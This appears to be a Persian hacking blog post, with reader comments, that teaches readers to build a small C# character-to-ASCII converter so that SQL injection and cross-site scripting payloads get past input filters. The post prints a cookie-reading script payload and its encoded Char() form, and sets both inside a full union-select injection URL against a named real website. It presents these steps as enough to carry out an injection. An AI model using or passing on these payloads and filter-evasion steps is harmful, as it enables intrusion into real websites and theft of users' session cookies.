تبدیل کارکتر به کدهای اسکی :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

ھمونطور که میدونید یکی از روشھای ھک سایت ، تزریق کدھای SQL به دیتابیس سایتھا ھست
که تو این وب ھم با چند تا از روش ھای این نوع حمله آشنا شده بودیم مثل این پست و این پست ....
برای جلوگیری از ھک شدن به این روش دوستان برنامه نویس راھکارھای مختلفی رو پیش گرفتن که یکی از این راھکارھا اینه که بعضی از کدھا و یا بھتر بگم کارکتر ھا رو فیلتر کردن تا مثلا ھکر نتونه کارکترھای خاص یا کدھاشو به دیتابیسشون تزریق کنه !!!
خوب این روش جالبیه
حالا ما اگه بخواییم این راھکار رو دور بزنیم باید موقع تزریق کدھامون اونارو قبلش یکم آرایششون کنیم و بھشون برسیم :)
برای اینکار تو جواب یکی از کامنت ھا گفته بودم که از کدھای اسکی استفاده میکنیم
یعنی کدی که میخواییم تزریقش کنیم رو ابتدا به کدھای اسکی تبدیل میکنیم و ...
بعدا ھمون دوستمون دوباره سوال کرده بود که چطوری به کدھای اسکی تبدیلشون کنم؟
من ھم تصمیم گرفتم این موضوع رو براش موشکافی کنم

چون به نظرم داره روش کار میکنه ... چون سوال خوبی پرسید

برای اینکار میتونیم از خیلی جاھا کمک بگیریم البته باید بگم " شاید " بتونیم از خیلی جاھا و چیزھا میشه کمک گرفت ولی بھترین کسی که میتونیم ازش کمک بگیریم خودمون ھستیم !!!
در این پست ابتدا درست کردن یه نرم افزار به زبان سی شارپ رو یاد میگیریم و بعدش ھم روش تزریق کردن کدھا رو یه توضیحی میدم ....
به نظر من اینطوری بھتره چون در این صورت ھم یکم بیشتر با برنامه نویسی آشنا شدیم ھم اینکه به برنامه ای که قراره تو کارھای آینده مون هم ازش استفاده کنیم اطمینان کامل داریم و ھم اینکه ....
خوب بریم سر اصل مطلب :
اول این سی شارپ رو آتیش کنین بینم

به اون قسمتھایی که دورشون خط قرمز کشیدم دقت کنین!!!
تو محیط فرم یدونه Button دوتا Text box اضافه کنید و به سلیقه ی خودتون اندازه و مکان این سه تا رو مرتب کنید

اون تیک رو بزنید میتونید اندازه شو دستکاری کنید!!!

البته شما میتونید چند تا عکس و نوشته و چرت و پرتای دیگه ھم اضافه کنید تا برنامه تون قشنگ تر جلوه بده چون شما ھنوز جوونید مطمئنم از این غرتی بازی ھا خوشتون میاد :)!!!
خخخخخ شوخی کردم عکس مکساتو بزار راحت باش بت نمیگم غرتی ... :)
خوب حالا روی اون دکمه دوبار پشت سرھم کلیک کنید تا برین قسمت کدھا و کدھای زیر رو برای
دکمه تون ثبت کنید...

            string St = textBox1.Text;
string Str = string.Empty;
foreach (char C in St)
{
Str = Str + " " + (Convert.ToInt32(C)).ToString();
}
textBox2.Text = Str;

که کل کدهای اون صفحه اگه اسم تکست باکس و دکمه رو تغییر ندین به شکل زیر میشه

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;

namespace convert_32
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}

private void button1_Click(object sender, EventArgs e)
{
string St = textBox1.Text;
string Str = string.Empty;
foreach (char C in St)
{
Str = Str + " " + (Convert.ToInt32(C)).ToString();
}
textBox2.Text = Str;
}
}
}

خوب کارمون تموم شد میتونید برای اطمینان از برنامه یه تست بگیرین تا یه وقت خدایی نکرده خطا نداشته باشه

حالا برگردیم به ابھامات اون پست ھای تزریقیمون
برای مثال من در این پست تزریق کد زیر رو بصورت ناقص گفته بودم :

<script>alert(document.cookie)</script>

در کل ابتدا تیبل ھا و کولمن ھارو بدست میاریم و یه کولمنی رو که ضعف داره رو انتخاب میکنیم و به کمک اون تزریق رو شروع میکنیم

(برای بهتر متوجه شدن این پست رو بخونید)

که تو بعضی از سایت ھا تزریق ھامون مورد قبول نبودن و کاری از پیش نمیرفت
در این مواقع کارھای زیر رو باید انجام بدیم :
ابتدا ھمه فاصله ھای موجود در کدمون رو پاک میکنیم
برای مثال کد زیر قابل قبول نیست

<script > alert ( document.cookie ) </script >

که به این شکل درسته :

<script>alert(document.cookie)</script>

حالا ھمین کد رو به کمک اون برنامه ای که ساختیم به اسکی تبدیل میکنیم که به شکل زیر درمیاد.

60 115 99 114 105 112 116 62 97 108 101 114 116 40 100 111 99 117 109 101 110 116 46 99 111 111 107 105 101 41 60 47 115 99 114 105 112 116 62

سپس فاصله ھای موجود در کد اسکی رو ھم به , تبدیل میکنیم که میشه این :

60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62

این کار ھم یه روش خیلی ساده و سریع داره که دوست دارم خودتون بفھمید اگه نه که بازم دندم نرم چشمم کور اونم بھتون میگم!!! :)

خلاصه بعد از این که کد رو آماده کردید اونو درون تابع ()char قرار میدین و در کلومن آسیب پذیر قرار میدین و ....
در کل برای مثال این لینک :

http://www.pentagonusa.com/projects/archive.php?CategoryID=-98.9+union+select+1,2,<script>alert(document.cookie)</script>,4,5,6,7,8,9,10,11,12--

تبدیل به این لینک میشه :

http://www.pentagonusa.com/projects/archive.php?CategoryID=-98.9+union+select+1,2,Char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62),4,5,6,7,8,9,10,11,12--

با این پست تزریق Sql کامل شد

یعنی شما اگه دوتا پست لینک شده و این پست رو خوب بخونید خیلی راحت میتونید یه تزریق رو انجام بدین و...

نرم افزاری که در طی آموزش ساخته شد رو هم اینجا قرار میدم برای اونایی که شرایط برنامه نویسی ندارن ....

دریافت
حجم: 9 کیلوبایت

نظر (۸)

سلام ویروس
برنامه جالبه فقط میتونی کاری کنی که با وارد کردن کد اسکی کلمه مورد نظر یا جمله مورد نظر رو برامون نمایش بده؟ یعنی دقیقا برعکس همین برنامه
Virus32 Virus 32 :
سلام رفیق
باشه اون رو هم آماده میکنم
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
سلام ویروس جان
اگه بشه اینا با سی شارپ کنسول نوشت دیه نیازی هم به سی شارپ ندارن و فقط با نوت پد بنویسن و با سی ام دی خروجیش بگیرن تو وبلاگم آموزشش گذاشتم البته به احتمال زیاد کاربرا دوست ندارن بیان تو این وبلاگ میتونین آموزششا خودتون تو وبتون بزارین
htt************************2/18/%DA%A9%D8%A7%D9%85%D9%BE%D8%A7%DB%8C%D9%84-%D8%A8%D8%AF%D9%88%D9%86-%D9%86%************************%D8%B2%D8%A7%D8%B1-%D8%AF%D8%B1-c
Virus32 Virus 32 :
سلام دوست عزیز
کاملا درسته ولی به نظر من اگه با این نرم افزار آشنا بشن برای کاربرا بهتر خواهد بود
اگه در این باره اطلاعات بیشتری داری بهتون پیشنهاد همکاری میدم
سلام داداش مدت طولانی که گفتی نیستم تموم شدش
از کی بود نبودی دلم تنگ شده بود
Virus32 Virus 32 :
:*
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
دادش خیلی دوست دارم باهات همکاری کنم ولی برنامه سازیم نمیدونم درستی هست که به دردتون بخوره یانه درمورد هک مثل شما حرفه ای نیستم تازگی رفتم تو یک انجمن ثبت نام کردم که چیزی مقدماتی هکا یاد بدن البته قبلش تو یه انجمن دیه رفته بودم
یخورده نرم افزار جدید بجز اینایی که اینجاست یاد گرفتم اگه میخواید براتون تو ایمیلت بفرستم راستی اگه نرم افزار های تو وبلاگم به دردتون میخورد این رمز ادامه مطلبم هستش******
Virus32 Virus 32 :
سلام عزیز
برام ایمیل کن
اگه بدونم قابل اعتماد هستی یه اکانت برات درست میکنم بیایی تو مدیریت باهم کار کنیم
این کار ھم یه روش خیلی ساده و سریع داره که دوست دارم خودتون بفھمید اگه نه که بازم دندم نرم چشمم کور اونم بھتون میگم!!! :)

سلام ویروس این که خیلی راحته فقط کافیه تو این قسمت :

Str = Str + " " + (Convert.ToInt32(C)).ToString();

تو اون دابل کوتیشن " " به جای space علامت , رو بزاریم که میشه این ","

در کل کد میشه این:

Str = Str + "," + (Convert.ToInt32(C)).ToString();
Virus32 Virus 32 :
سلام عزیز
خدا بگم چیکارت نکنه :|
دستم بهت برسه از دماغ آویزونی D:
باهوش ترین کاربر این وب یواش یواش من باید بیام شاگردت شم :)
دمت گرم خوشم اومد ♥ ;)
یه روش دیگه هم هست با فرض اینکه برنامه رو تکمیل کردیم و به سورسها هم دسترسی نداریم
سلام ویروس
قوربانت خخخخ همین که این جمله {باهوش ترین کاربر این وب یواش یواش من باید بیام شاگردت شم :)} رو گفتی داشتم میرفتم تو افق که این جمله رو دیدم

[یه روش دیگه هم هست با فرض اینکه برنامه رو تکمیل کردیم و به سورسها هم دسترسی نداریم]

خب برای اینکار وقتی داریم کاراکتر مورد نظر رو وارد میکنیم بین هر کدام از حرف ها علامت , رو میزاریم
مثال : v,e,r,y,a

ولی این روش هم جواب نمیده :| چون خود این علامت , رو به کد اسکی تبدیل میکنه! (کل راه ها رو امتحان کردم نشد D:)

پس نتیجه میگیریم که وقتی برنامه رو تکمیل کردیم و به سورس ها دسترسی نداریم راهی وجود نداره!
Virus32 Virus 32 :
عزیزی داداش
من رو تو یجور دیگه حساب باز میکنم همیشه ;)
نوت پد رو باز کن کلیدهای ترکیبی ctrl + h رو بزن :)
کادر اول فاصله (Space) کادر دوم هم ,
با سلام.
با 5 خط کد تو cpp میتونستی این کار رو انجام بدی و نیاز به این همه زحمت نداشت :)

ولی ناموسن دمت جیلیز ویلیز :))))))

اینکار با پایتون چجوریه

 

اخه من سی شارپ ندارم

 

Virus32 ولم کنید (: :
B''

ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی